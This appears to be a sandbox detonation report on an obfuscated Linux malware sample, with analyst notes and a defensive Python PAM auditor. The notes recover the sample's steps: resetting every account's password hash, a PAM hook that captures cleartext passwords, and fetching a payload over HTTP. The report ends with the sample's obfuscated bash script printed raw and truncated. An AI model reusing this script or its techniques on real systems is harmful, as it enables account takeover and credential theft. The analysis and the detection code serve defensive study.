SHA256 0e4b06466a4c58fbf83afd9939466b7c2a461c27ee876cbec97afae04e53e44b
SHA512 2913398db0dcd7d719c1b455d6d62797f042f99fe8653b97bd36d3354d659d05e400b8d3729254ec793ed37876d0045628f9bd26ba566e1a4bb86c3df39b1954

/etc/shadow+

MD5 af71400bbb59d689a6d8ca145ee6a868
SHA1 6e12abb9495328fc5e424edf26998397382cd5bb
SHA256 37482af0ac86aab195e1cc081ef8ed740ea79573baf8ee14b5d80a5048367e6a
SHA512 197fc4c72429864863c9bbb6581af2f31cb5653b279c347affdace02e3668e3582f94a157a7c9ad95846e84cc8c65fde383e9d9dbd9e59ab7fb6f564d3667fea

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

148s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

Signatures

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

These usermod writes are not account housekeeping. Rebuilding the obfuscated bash -c argument listed under Processes shows a loop of the form for username in $users; do usermod -p '$6$...' $username > /dev/null 2>&1; ...; done, followed by the same usermod -p for root, where $users is every account in /etc/passwd whose shell is bash, sh, zsh or fish. Each shell-capable account, root included, gets its password hash replaced with the attacker's, so legitimate credentials stop working after detonation. The remaining useradd/usermod rows belong to the new account created by the useradd sequence flagged below under "Adds a user to the system".

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A
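
This single row is the sample's credential-capture persistence. Rebuilding the obfuscated bash -c argument listed under Processes yields the line it appends to /etc/pam.d/common-auth: auth optional pam_exec.so quiet expose_authtok /usr/sbin/pam_tms. With expose_authtok, pam_exec writes the cleartext password of every user who authenticates to the named program's stdin; optional plus quiet means a missing or failing program never disturbs a login, so the hook is invisible to users. The Python below is an added example for this report, not code from the sample, the sandbox, or any PAM project: it parses PAM stack lines (including the bracketed [success=1 default=ignore] control form Ubuntu uses) and flags pam_exec entries that expose the authentication token, which is the check to run on a host that shows this signature. The configuration lines it ships with are constructed for the test; the pam_unix/pam_deny/pam_permit/pam_cap lines approximate a stock Ubuntu common-auth and the last line is the one recovered from the sample.

```python
"""Flag PAM stack lines that hand the cleartext password to an external program."""
import re
from dataclasses import dataclass

# "type control module [args]" where control is a word or a bracketed
# list such as [success=1 default=ignore]; a leading '-' on the type
# only silences "module not found" logging.
PAM_LINE_RE = re.compile(
    r"^\s*(?P<type>-?[a-z]+)\s+(?P<control>\[[^\]]*\]|\S+)\s+"
    r"(?P<module>\S+)\s*(?P<args>.*?)\s*$"
)
# Options documented by pam_exec(8); anything else on the line is the command.
PAM_EXEC_FLAGS = {"debug", "expose_authtok", "seteuid", "quiet", "quiet_log", "stdout"}


@dataclass
class Finding:
    lineno: int
    stack: str
    control: str
    program: str
    reason: str


def parse_pam_lines(text):
    """Yield (lineno, type, control, module, args) for each directive line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0]          # strip comments
        if not line.strip() or line.lstrip().startswith("@include"):
            continue
        m = PAM_LINE_RE.match(line)
        if m:
            yield lineno, m["type"], m["control"], m["module"], m["args"].split()


def audit_pam(text):
    """Return a Finding for every pam_exec entry that exposes the auth token."""
    findings = []
    for lineno, stack, control, module, args in parse_pam_lines(text):
        if module.rsplit("/", 1)[-1] != "pam_exec.so":
            continue
        opts = [a for a in args if a in PAM_EXEC_FLAGS or a.startswith(("log=", "type="))]
        rest = [a for a in args if a not in opts]
        program = rest[0] if rest else ""
        if "expose_authtok" in opts:
            reason = "expose_authtok writes the user's password to the program's stdin"
            if control == "optional" and "quiet" in opts:
                reason += "; optional+quiet hides any failure, so the hook never disturbs logins"
            findings.append(Finding(lineno, stack.lstrip("-"), control, program, reason))
    return findings


# Constructed sample for the test: an approximation of Ubuntu's stock
# common-auth plus the line recovered from the sample's obfuscated script.
SAMPLE_COMMON_AUTH = """\
# /etc/pam.d/common-auth - authentication settings common to all services
auth\t[success=1 default=ignore]\tpam_unix.so nullok
auth\trequisite\t\t\tpam_deny.so
auth\trequired\t\t\tpam_permit.so
auth\toptional\t\t\tpam_cap.so
auth optional pam_exec.so quiet expose_authtok /usr/sbin/pam_tms
"""

if __name__ == "__main__":
    for f in audit_pam(SAMPLE_COMMON_AUTH):
        print(f"line {f.lineno}: {f.stack} {f.control} -> {f.program}: {f.reason}")
```

On a live host, feed it every file under /etc/pam.d (the sample only touches common-auth, but an @include of common-auth pulls the hook into sshd, login, sudo and su), then compare the flagged program against the package database: /usr/sbin/pam_tms belongs to no package and, per the rebuilt script, is fetched over plain HTTP.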

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/usermod N/A
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

This touch does not install a job. In the rebuilt script it follows crontab -r, chattr -ia /etc/crontab and rm -rf /etc/crontab, so the sample wipes whatever the system crontab contained and recreates it empty. Persistence on this run comes from the PAM hook, the authorized_keys replacement and the added account, not from cron.

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Both files are dpkg unpacking the msr-tools package (apt-get install -y msr-tools under Processes), which provides rdmsr and wrmsr for reading and writing CPU model-specific registers; RandomX miners such as XMRig tune MSRs for hashrate. The rebuilt script installs the package only when wrmsr is absent (if ! command -v wrmsr &> /dev/null), so on a host that already has it this signature will not fire.

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/390/maps /usr/sbin/needrestart N/A
File opened for reading /proc/781/maps /usr/sbin/needrestart N/A
File opened for reading /proc/833/maps /usr/sbin/needrestart N/A
File opened for reading /proc/358/maps /usr/sbin/needrestart N/A
File opened for reading /proc/751/maps /usr/sbin/needrestart N/A
File opened for reading /proc/792/maps /usr/sbin/needrestart N/A
File opened for reading /proc/794/maps /usr/sbin/needrestart N/A
File opened for reading /proc/829/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/419/maps /usr/sbin/needrestart N/A
File opened for reading /proc/440/maps /usr/sbin/needrestart N/A
File opened for reading /proc/580/maps /usr/sbin/needrestart N/A
File opened for reading /proc/586/maps /usr/sbin/needrestart N/A
File opened for reading /proc/736/maps /usr/sbin/needrestart N/A
File opened for reading /proc/761/maps /usr/sbin/needrestart N/A
File opened for reading /proc/831/maps /usr/sbin/needrestart N/A
File opened for reading /proc/589/maps /usr/sbin/needrestart N/A
File opened for reading /proc/723/maps /usr/sbin/needrestart N/A
File opened for reading /proc/727/maps /usr/sbin/needrestart N/A
File opened for reading /proc/791/maps /usr/sbin/needrestart N/A
File opened for reading /proc/893/maps /usr/sbin/needrestart N/A

All of these reads come from /usr/sbin/needrestart -m u, which apt's post-install hook (apt-pinvoke, under Processes) runs to find processes that still map replaced libraries. They are a side effect of the msr-tools install, not the sample reading other processes' memory.

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

pool-spawner, gmain and gdbus are the names GLib gives its own worker threads. The process is the gdbus PackageKit.StateHasChanged call that apt runs after the install (under Processes), so these rows are package-manager noise rather than evasion by the sample.

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1935/ctty /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1830/stat /usr/bin/pkill N/A
File opened for reading /proc/52/ctty /usr/bin/pkill N/A
File opened for reading /proc/17/cgroup /usr/bin/pkill N/A
File opened for reading /proc/276/status /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1751/maps /usr/sbin/needrestart N/A
File opened for reading /proc/39/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1830/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2292/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1121/cgroup /usr/bin/pkill N/A
File opened for reading /proc/386/stat /usr/bin/pkill N/A
File opened for reading /proc/458/ctty /usr/bin/pkill N/A
File opened for reading /proc/586/stat /usr/bin/pkill N/A
File opened for reading /proc/200/stat /usr/bin/pkill N/A
File opened for reading /proc/46/status /usr/sbin/needrestart N/A
File opened for reading /proc/586/environ /usr/sbin/needrestart N/A
File opened for reading /proc/5/ctty /usr/bin/pkill N/A
File opened for reading /proc/198/status /usr/bin/pkill N/A
File opened for reading /proc/1081/stat /usr/bin/pkill N/A
File opened for reading /proc/2175/cgroup /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/276/ctty /usr/bin/pkill N/A
File opened for reading /proc/2083/cgroup /usr/bin/pkill N/A
File opened for reading /proc/65/ctty /usr/bin/pkill N/A
File opened for reading /proc/23/ctty /usr/bin/pkill N/A
File opened for reading /proc/50/cgroup /usr/bin/pkill N/A
File opened for reading /proc/589/status /usr/bin/pkill N/A
File opened for reading /proc/196/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1061/stat /usr/bin/pkill N/A
File opened for reading /proc/156/ctty /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/833/stat /usr/sbin/needrestart N/A
File opened for reading /proc/2087/status /usr/sbin/needrestart N/A
File opened for reading /proc/1069/status /usr/bin/pkill N/A
File opened for reading /proc/2040/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1985/cgroup /usr/bin/pkill N/A
File opened for reading /proc/31/status /usr/bin/pkill N/A
File opened for reading /proc/44/ctty /usr/bin/pkill N/A
File opened for reading /proc/1121/cgroup /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/sbin/useradd N/A
File opened for reading /proc/193/status /usr/sbin/needrestart N/A
File opened for reading /proc/390/environ /usr/sbin/needrestart N/A
File opened for reading /proc/17/stat /usr/bin/pkill N/A
File opened for reading /proc/2292/ctty /usr/bin/pkill N/A
File opened for reading /proc/80/cmdline /usr/bin/pkill N/A
File opened for reading /proc/124/status /usr/bin/pkill N/A
File opened for reading /proc/736/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1743/environ /usr/sbin/needrestart N/A
File opened for reading /proc/2175/ctty /usr/bin/pkill N/A
File opened for reading /proc/80/status /usr/bin/pkill N/A
File opened for reading /proc/440/stat /usr/bin/pkill N/A
File opened for reading /proc/1094/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2249/ctty /usr/bin/pkill N/A
File opened for reading /proc/2193/cgroup /usr/bin/pkill N/A
File opened for reading /proc/390/status /usr/sbin/needrestart N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/893/ctty /usr/bin/pkill N/A
File opened for reading /proc/1069/stat /usr/bin/pkill N/A
File opened for reading /proc/2238/status /usr/bin/pkill N/A
File opened for reading /proc/11/cgroup /usr/bin/pkill N/A
File opened for reading /proc/54/cmdline /usr/bin/pkill N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A

Processes

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c exec '/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383' "$@" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! 
g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! 
-';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! 
X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval 
"$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tB
